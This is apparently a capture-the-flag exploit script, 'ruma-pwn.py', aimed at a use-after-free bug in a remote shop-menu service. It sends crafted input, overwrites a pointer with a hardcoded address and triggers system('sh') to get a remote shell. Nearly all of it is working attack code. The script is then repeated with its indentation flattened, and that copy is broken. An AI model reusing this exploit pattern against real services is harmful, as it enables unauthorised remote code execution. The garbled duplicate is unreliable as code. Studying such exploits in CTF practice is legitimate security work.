Mipu94/ruma-pwn.py

## ruma-pwn.py
#this is useafterfree challenge,to trigger bug we need more than 10 item (0x08048DF5).
#we need run this script sevaral times to get shell
from customlibpwn import *
########################################################
#			PWN! PWN! PWN!
########################################################
def change_name(name):
	send("3")
	recvu("what is your name?:")
	send(name)
	recvu("4. buy item")

def doexploit():
	sock("52.78.27.112",10001,64)
	#sock("localhost",4000,64)
	recvu("what is your name?:")
	send("A"*8)
	recvu("4. buy item")
	send("1337\n")
  #we need money to buy item
  recvu("your command? :")
	send("show me the money")
	recvu("4. buy item")
	send("1337\n")
	recvu("your command? :")
	send("show me the money")
	recvu("4. buy item")
	send("2\n")
	recvu("4. buy item")
  #buy 11 item
	for i in range(11):
		send('4\n')
		recvu("3. jook sphere (300 zeny)")
		send("1\n")
		recvu("4. buy item")
  #trigger bug
	send("1337\n")
	recvu("your command? :")
	send("game over man")
	recvu("4. buy item")
  #over write pointer player-info -> address command
	send("1337\n")
	recvu("your command? :")
	send("\x00"*8+p32(0x804B06C))#player-info -> command
	recvu("4. buy item")
	send("4")
	recvu("3. jook sphere (300 zeny)")
	send("26739")# send hex('sh') instead 1,2,3 then *command -> sh :D
	print "here"
	recvu("4. buy item")
	send("1337\n")
	recvu("your command? :")
	send("power overwhelming") #->triggle system('sh')
	print("shell")

	telnet()

doexploit()
	#this is useafterfree challenge,to trigger bug we need more than 10 item (0x08048DF5).
	#we need run this script sevaral times to get shell
	from customlibpwn import *
	########################################################
	# PWN! PWN! PWN!
	########################################################
	def change_name(name):
	send("3")
	recvu("what is your name?:")
	send(name)
	recvu("4. buy item")

	def doexploit():
	sock("52.78.27.112",10001,64)
	#sock("localhost",4000,64)
	recvu("what is your name?:")
	send("A"*8)
	recvu("4. buy item")
	send("1337\n")
	#we need money to buy item
	recvu("your command? :")
	send("show me the money")
	recvu("4. buy item")
	send("1337\n")
	recvu("your command? :")
	send("show me the money")
	recvu("4. buy item")
	send("2\n")
	recvu("4. buy item")
	#buy 11 item
	for i in range(11):
	send('4\n')
	recvu("3. jook sphere (300 zeny)")
	send("1\n")
	recvu("4. buy item")
	#trigger bug
	send("1337\n")
	recvu("your command? :")
	send("game over man")
	recvu("4. buy item")
	#over write pointer player-info -> address command
	send("1337\n")
	recvu("your command? :")
	send("\x00"*8+p32(0x804B06C))#player-info -> command
	recvu("4. buy item")
	send("4")
	recvu("3. jook sphere (300 zeny)")
	send("26739")# send hex('sh') instead 1,2,3 then *command -> sh :D
	print "here"
	recvu("4. buy item")
	send("1337\n")
	recvu("your command? :")
	send("power overwhelming") #->triggle system('sh')
	print("shell")

	telnet()

	doexploit()